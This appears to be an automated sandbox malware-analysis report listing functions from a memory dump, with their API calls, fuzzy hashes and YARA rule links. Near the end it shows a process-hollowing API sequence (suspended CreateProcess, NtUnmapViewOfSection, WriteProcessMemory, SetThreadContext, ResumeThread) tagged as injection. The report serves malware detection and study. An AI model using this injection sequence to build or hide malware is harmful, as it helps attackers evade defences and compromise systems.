Instruction ID: 5141bb21011ee4f5ddda17bca2f86b4db84e193de05cbf01f60eefdb05fbe3fb
Opcode Fuzzy Hash: 979b42e21b32d90a2ebfd9e98383705e0bd9c723ee32b2bb6f57d1f4597c0e97
Instruction Fuzzy Hash: 0E910570E00109ABDF14EFA9DC85BEEBBB9EF84304F50416EE501B7281D7796A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402890, Relevance: 4.6, APIs: 3, Instructions: 127threadsleepinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0040EF20: Concurrency::cancel_current_task.LIBCPMT ref: 0040F041

CreateThread.KERNEL32 ref: 004028F6
Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,00409323,?,00000000,00000000), ref: 00402903
SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,00409323,?,00000000,00000000), ref: 0040290A

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
String ID:
API String ID: 1039963361-0
Opcode ID: ed7d6f00f924da3ff3f4933ce1a091223abadbbcdcd7e712c7c181b8b9320891
Instruction ID: 9789403ed1d8a60cfd9dcce85231cf1f3a960594b6cceb2f2029b4867e38d107
Opcode Fuzzy Hash: ed7d6f00f924da3ff3f4933ce1a091223abadbbcdcd7e712c7c181b8b9320891
Instruction Fuzzy Hash: 4E411671310248ABEB18CF28CE89B9D3B56EF86314F50863AF845A72D6C77DD4C08B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAAA, Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EB1D
_free.LIBCMT ref: 0041EB73

Part of subcall function 0041E94F: _free.LIBCMT ref: 0041E9A7
Part of subcall function 0041E94F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042B608), ref: 0041E9B9

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 3d44bb914782fe0d1d397898fe92ffdcde4663514b8a49fabb97bcbb705dedb2
Instruction ID: ace21171c3c18d66e1851376e7815d4a61efc0610b71bac9099fccd9b772e005
Opcode Fuzzy Hash: 3d44bb914782fe0d1d397898fe92ffdcde4663514b8a49fabb97bcbb705dedb2
Instruction Fuzzy Hash: F421497590412896C730E7279C81EEBB3688F40324F1102ABED96A2181DA38ADC1899D

Uniqueness

Uniqueness Score: -1.00%

Function 004025B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

<, xrefs: 004026AC

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 9333c24a984216c25898217a3bf75a927303967b15c9524077ea759ce712f529
Instruction ID: a40f3c10d37d961b7c779bcf4790547cd1550e8f20a317977a521366b7733ebe
Opcode Fuzzy Hash: 9333c24a984216c25898217a3bf75a927303967b15c9524077ea759ce712f529
Instruction Fuzzy Hash: 225157316043059BDB18EF29CA4939E7BE1AF89308F504A2FFC45672C1DBB9C5848BC9

Uniqueness

Uniqueness Score: -1.00%

Function 00405A87, Relevance: 3.2, APIs: 2, Instructions: 217COMMON

Download Yara Rule

APIs

Part of subcall function 004049F0: GetTempPathW.KERNEL32(00000104,?,?,?), ref: 0040470E

GetFileAttributesA.KERNEL32(00000000), ref: 00405AC4
GetFileAttributesA.KERNEL32(00000000), ref: 00405BEB

Part of subcall function 00404010: GetVersionExW.KERNEL32(0000011C,?,?,80000001), ref: 00404066

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile$PathTempVersion
String ID:
API String ID: 2626274839-0
Opcode ID: d4de1e2f6ef231979900cfce626929905b1333df7124e5a972554592df1b5fc8
Instruction ID: b7af99aa28748ad154c4451e2d0904c5c071e02b78cac4886ec2c498b2a184ee
Opcode Fuzzy Hash: d4de1e2f6ef231979900cfce626929905b1333df7124e5a972554592df1b5fc8
Instruction Fuzzy Hash: 4D610871A006045BEB1CDB28DD8AB6FB672DF82304F24463EE411B72D6D77DA9848F49

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE0, Relevance: 3.1, APIs: 2, Instructions: 96synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00404E41
GetLastError.KERNEL32(?,00000000), ref: 00404E47

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 091c3417657aa0a009aab181ba20c7c4dd6ea5717a83ac631fb2efadfd4e1a80
Instruction ID: 2e9549398049608871f2d66a8051869272746d0e27d8f52d4ac77c378fe54d7e
Opcode Fuzzy Hash: 091c3417657aa0a009aab181ba20c7c4dd6ea5717a83ac631fb2efadfd4e1a80
Instruction Fuzzy Hash: DF31F171A000099BCB18DF68C884BAEB7B1FF85301F60417AE211F76D1D73CAA858B98

Uniqueness

Uniqueness Score: -1.00%

Function 004127DB, Relevance: 3.1, APIs: 2, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52d14a54af1da4892a82c8f608525e33545e135e620db0d4329ff52d0d349d2
Instruction ID: b000caf9ad398e947894924073d21304d32da157b7d833cd6c9558a0c5638c97
Opcode Fuzzy Hash: f52d14a54af1da4892a82c8f608525e33545e135e620db0d4329ff52d0d349d2
Instruction Fuzzy Hash: 3F21F7315011087EEB117BA9DD42BDE7728AF4137CF20032AF9206B2D0DBB85E9586A9

Uniqueness

Uniqueness Score: -1.00%

Function 00412AB3, Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,004129EA,?,?,00000000,00000000), ref: 00412AE1
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,004129EA,?,?,00000000,00000000), ref: 00412AF5

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 09773b064c24995cd91c4ff6052377d8dead163c09f9d9a21a5ae8624ddc24ed
Instruction ID: 4402b726b5dbc39d0ecc2f00a2bbfcb965d6195dac46cad3f04607e4bb626cfe
Opcode Fuzzy Hash: 09773b064c24995cd91c4ff6052377d8dead163c09f9d9a21a5ae8624ddc24ed
Instruction Fuzzy Hash: 7811067690420CABCB11DFE5C984ADF77BCAF08310F504267E516E6180EA74FA99CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004151DE, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00415226

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 852a5d5e6fda3380e7aa9c232198e5da2cfac743343e3e660ca1e4fb1c787c7a
Instruction ID: 54e5736bf439b03706d62c3d25b936a259c77376b6810aee24fe4131f124c25a
Opcode Fuzzy Hash: 852a5d5e6fda3380e7aa9c232198e5da2cfac743343e3e660ca1e4fb1c787c7a
Instruction Fuzzy Hash: 38E03933A55910D2A226767B7C462FA16859BC1379F22027BE424D62E0EF7888C2499E

Uniqueness

Uniqueness Score: -1.00%

Function 02870DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02870223,?,?), ref: 02870E02
SetErrorMode.KERNEL32(00000000,?,?,02870223,?,?), ref: 02870E07

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 37f17f091cf5cfe66d55d7d77e807a88f21376c82dd1d0ddcd112aa778e5cc80
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 6CD0123614512C77D7402B94DC09BCD7B1C9F05B67F008011FB0DD9181C7B0994047E5

Uniqueness

Uniqueness Score: -1.00%

Function 00404F35, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00404F3E

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2c33839803d01786411aec43ab3f19e81eeee812ec42f10ffa35f20325d1fe06
Instruction ID: 74954f3a5565af6f4a2a72e75f99fb6efd97cd0c7dc4613c37333c00011d701c
Opcode Fuzzy Hash: 2c33839803d01786411aec43ab3f19e81eeee812ec42f10ffa35f20325d1fe06
Instruction Fuzzy Hash: 8B2134717005015BEB18DA68DD89B5EBA62DF82314F20863FE414A77E6D73D99848B88

Uniqueness

Uniqueness Score: -1.00%

Function 00405062, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00405065

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0fdb0d32902549fd6010946b351a376f5370ce674de59dd1d9fae62ffd77c338
Instruction ID: 138a4cbb795096ab85b48a2a8cc915b8bf06cd15740dab91d9d570bfc98b4d0f
Opcode Fuzzy Hash: 0fdb0d32902549fd6010946b351a376f5370ce674de59dd1d9fae62ffd77c338
Instruction Fuzzy Hash: 4721F631B1050557EB18DB28DD8976EB662EF82314F20863EE054BB7D6C77E99848B48

Uniqueness

Uniqueness Score: -1.00%

Function 004053D7, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 004053DA

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5417d7f219ae49d89e98bc66dffa7e8dc903143eeb4de4825d1aa5e8f97c1024
Instruction ID: 433a540059d314d4c7fa6b5cf96e7d0f0b5b89127f2e3011dac7becd2b3fabfb
Opcode Fuzzy Hash: 5417d7f219ae49d89e98bc66dffa7e8dc903143eeb4de4825d1aa5e8f97c1024
Instruction Fuzzy Hash: 9B21263171050457EB18CBB8DD8879EBA62DF82315F208A3EE014A77D6D77D89C08F48

Uniqueness

Uniqueness Score: -1.00%

Function 004054FE, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00405501

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 738592f96f53be953b0bff52fc181832866cecfb25e0ce85f61d1da3c18570b3
Instruction ID: 9ce4b038cc8d48b941b7e1cec4e1f8661994a8945f8bfbbe2ccd46c8fdfadc6b
Opcode Fuzzy Hash: 738592f96f53be953b0bff52fc181832866cecfb25e0ce85f61d1da3c18570b3
Instruction Fuzzy Hash: 4E21E9316106056BEB18CA68DD8576EBA63DF86314F20863EE415A73D9C77D99808B48

Uniqueness

Uniqueness Score: -1.00%

Function 00405625, Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00405628

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fea8f65a7ddb2150fda46b05ccbd067aa1d901558a04d98dafa9c5152ed3ea66
Instruction ID: 8d678e0a9b03d31d5be3fe8acc34f6a8e8c8bf695d2763d553306c4d338ee19a
Opcode Fuzzy Hash: fea8f65a7ddb2150fda46b05ccbd067aa1d901558a04d98dafa9c5152ed3ea66
Instruction Fuzzy Hash: DC21263170090457EB18DA38DE8975EB762DF82318F608A3FE015A73D6C77E89818B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040574C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040574F

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 875a2ef5670feedcead49799275bb4e40a4eb4bff728b106378e993ab7197327
Instruction ID: 13160ced8d59e3165ef8dd6ab2dd05e539b259de3c0aded1c6efbad7229dde10
Opcode Fuzzy Hash: 875a2ef5670feedcead49799275bb4e40a4eb4bff728b106378e993ab7197327
Instruction Fuzzy Hash: F6213A317106049BDB1CDB78DD8975EB662DF82314F20863FE454A77D6C77D99808B48

Uniqueness

Uniqueness Score: -1.00%

Function 00405873, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00405876

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a72d036d113317aa08e6438451e148bfd3bbb0071898c7a320b9a5deedc33ca7
Instruction ID: 87156ac5431d2fa57a8017f109ed4051e7dc88297cd24f5bcda7db2315a0642d
Opcode Fuzzy Hash: a72d036d113317aa08e6438451e148bfd3bbb0071898c7a320b9a5deedc33ca7
Instruction Fuzzy Hash: 15210971B005059BEB1C9B78DD8976EB762DF82314F208A3FE450A73D6D77D59804B88

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBB0, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0040EC64

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: bddb8bdfe38e38d49e6657d9be3fd0bd009136c52d77404090b877ce41ef5214
Instruction ID: fbc2921ed2bc4cef4c55a54174fc82a6a92fccc64e95ccfba416aa0ed6ca5ec8
Opcode Fuzzy Hash: bddb8bdfe38e38d49e6657d9be3fd0bd009136c52d77404090b877ce41ef5214
Instruction Fuzzy Hash: D42122B16043008FE724CF39D880656B7E8EB04354B100E3FE84ADB681E776E9A483A5

Uniqueness

Uniqueness Score: -1.00%

Function 0041645F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00416499

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a9ccdfc2be8a8c5bf3af093da8c97f9743254d288b4b4ff1e7692456254f3035
Instruction ID: cc3595f79466ffb933f834505881ae592987a4573fa10b2810df313edb08b8ed
Opcode Fuzzy Hash: a9ccdfc2be8a8c5bf3af093da8c97f9743254d288b4b4ff1e7692456254f3035
Instruction Fuzzy Hash: 6F111871A0410AAFCF05DF58E9419DB7BF5EF48308F1540AAF809AB351D634E911CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00412769, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004127D0

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 37700dd88deea54bdcb2886b04f3ff1d4b1f1d2d827f433a59b2a57d76293111
Instruction ID: e9cf385988e908a3be5076aba6c9210a8c4e29e80755c82aff425a49e28798b7
Opcode Fuzzy Hash: 37700dd88deea54bdcb2886b04f3ff1d4b1f1d2d827f433a59b2a57d76293111
Instruction Fuzzy Hash: E2018872C04109BEDF019FA49D417EF7BF4AB04314F10416BE424E11D1EAB48AE0C798

Uniqueness

Uniqueness Score: -1.00%

Function 004126FF, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041275E

Part of subcall function 00417645: DeleteFileW.KERNEL32(R'A,?,00412752,?,?,?,?), ref: 0041764D
Part of subcall function 00417645: GetLastError.KERNEL32(?,00412752,?,?,?,?), ref: 00417657
Part of subcall function 00417645: __dosmaperr.LIBCMT ref: 0041765E

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: DeleteErrorFileLast__dosmaperr_free
String ID:
API String ID: 3353641461-0
Opcode ID: 9ae0e19ef64f5093953115a5dba9c7d0d6d348911aef452eb829f6ac0bb9f163
Instruction ID: 378ffb9617e9102469bd162a9a0c44634e38492000892d74210f2090c73e18cf
Opcode Fuzzy Hash: 9ae0e19ef64f5093953115a5dba9c7d0d6d348911aef452eb829f6ac0bb9f163
Instruction Fuzzy Hash: C3018671D05119AEDF00ABB9DD417EFBBF49B04328F14016BE425E21D1E6B48AD1C799

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB6A, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041DBCD

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 24e3c007ec57d6ebd588f531e7a99f6d1e537632e71a79deff46e0281b5a7d00
Instruction ID: bdd6835059e051d86575645b9de8beb1e9075d51f21cadee273f298d98b7e4ab
Opcode Fuzzy Hash: 24e3c007ec57d6ebd588f531e7a99f6d1e537632e71a79deff46e0281b5a7d00
Instruction Fuzzy Hash: B5018FB2C05159BFCF01AFA8CC019EE7FB5AF08314F14016AF925E21A1E6359AA0DB84

Uniqueness

Uniqueness Score: -1.00%

Function 00416AEA, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040E3EC,?,?,0040FD13,0040E3EC,?,0040EC38,E8004311,74B06490), ref: 00416B1C

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 318ea7e4fdbb36b820ab8c904d9c3d4f41e1f2e2b0d1b89830e62106e8ec42cb
Instruction ID: 31e6bcfa576d0f434f4f1c8ade444fe157d4e811e5a74eca956fd670acc5e426
Opcode Fuzzy Hash: 318ea7e4fdbb36b820ab8c904d9c3d4f41e1f2e2b0d1b89830e62106e8ec42cb
Instruction Fuzzy Hash: 2EE0EC3124913166D63026569C00FDB3B889F413A1F03013BFC05D6290EB5CFC8185DD

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8B1, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0041DCA1,?,?,00000000,?,0041DCA1,00000000,0000000C), ref: 0041D8CE

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f4284ebefad32896ae27c04ba37a0df0535649db73f9f0f9d55800fa928cc254
Instruction ID: ceed89300155e818d6c5368a0feea72a114c098ece8793ea31281d03f641e89b
Opcode Fuzzy Hash: f4284ebefad32896ae27c04ba37a0df0535649db73f9f0f9d55800fa928cc254
Instruction Fuzzy Hash: C0D06C3210010DBFDF128F84DC06EDA3BAAFB48714F014110BA1856120C732E872EB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3D0, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0002BF20), ref: 0040E41B

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 13071dd12efd327894f4f5d0d8058f853b1350d93807c41b6fb82e8c6916aa64
Instruction ID: 215d9b8d4e9c8047318c876fceb3c4b42e8cd86b163d8906ccf052b0025636c1
Opcode Fuzzy Hash: 13071dd12efd327894f4f5d0d8058f853b1350d93807c41b6fb82e8c6916aa64
Instruction Fuzzy Hash: 9AE04F15B40010638414327F1D3363E3825098166879415AEEC42372D7ECAC2A2102DF

Uniqueness

Uniqueness Score: -1.00%

Function 0040E470, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0002BF20), ref: 0040E4BB

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2871560d75dfc3f9dfc7dab9cd86fa7d79e35920f62a4b9baf2771ddb470c95b
Instruction ID: a4b3f8826c95ac59e0368e7ae95fb21bbea042a1a423ba7d1d0e91edb5c32423
Opcode Fuzzy Hash: 2871560d75dfc3f9dfc7dab9cd86fa7d79e35920f62a4b9baf2771ddb470c95b
Instruction Fuzzy Hash: 75E08615F4002063C404327F1C3753E38250A9176879416BEF8423B3D7ED6C2A2103DF

Uniqueness

Uniqueness Score: -1.00%

Function 0040E420, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0002BF20), ref: 0040E46B

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9ad64de28a25a4e0855386eea7483ff2f7f96e60d945232fb9f4e3a23232dbc2
Instruction ID: 8a19a7f6a30cb3e7797648cf3198516cac396a9e75ae8a1d791d13fd321e64aa
Opcode Fuzzy Hash: 9ad64de28a25a4e0855386eea7483ff2f7f96e60d945232fb9f4e3a23232dbc2
Instruction Fuzzy Hash: 7EE08616F4001063C404327F0D3353E3825098172C7941AAEF8423B3D7ED6C2A2103DF

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402250, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0040226C
CreateProcessA.KERNEL32 ref: 004022C5
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 004022DE
GetThreadContext.KERNEL32(?,00000000), ref: 004022F3
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00402316
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040232E
GetProcAddress.KERNEL32(00000000), ref: 00402335
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00402354
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0040236F
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 004023AC
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 004023DC
SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 004023F2
ResumeThread.KERNEL32(?,?,?,00000000), ref: 004023FB
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 00402409
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402420

Strings

ntdll.dll, xrefs: 00402329
NtUnmapViewOfSection, xrefs: 00402324

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 4033543172-1050664331
Opcode ID: 3078ffa1859de130ddeca60dbf4b09c62e6d23851e62b2b19299828d2c3f7800
Instruction ID: afd8631e990efc72bdc980619b5cc23537b0044600a19f4c07e0c489dac9edec
Opcode Fuzzy Hash: 3078ffa1859de130ddeca60dbf4b09c62e6d23851e62b2b19299828d2c3f7800
Instruction Fuzzy Hash: 2E516D71B40305BBEB209BA4DD85FAABB78FF08705F504065F608E62D0D7B4A955CB68

Uniqueness

Uniqueness Score: -1.00%

Function 028724A0, Relevance: 22.7, APIs: 15, Instructions: 155injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 028724BC
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 02872515
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 0287252E
GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 02872543
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 02872566
GetModuleHandleA.KERNEL32(0042CD8C,0042CD74,?,00000000,00000000), ref: 0287257E
GetProcAddress.KERNEL32(00000000), ref: 02872585
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 028725A4
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 028725BF
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 028725FC
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 0287262C
SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 02872642
ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 0287264B
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 02872659
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 02872670

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID:
API String ID: 4033543172-0
Opcode ID: 4bde5da5e5dbcce2e0a1285307c4a11a159059c42a3cf97298c197df96f77a5f
Instruction ID: 6328d5a5fac20863ff34dd48858929da3715f7896ec1c87403dd8d5f38b7c0b9
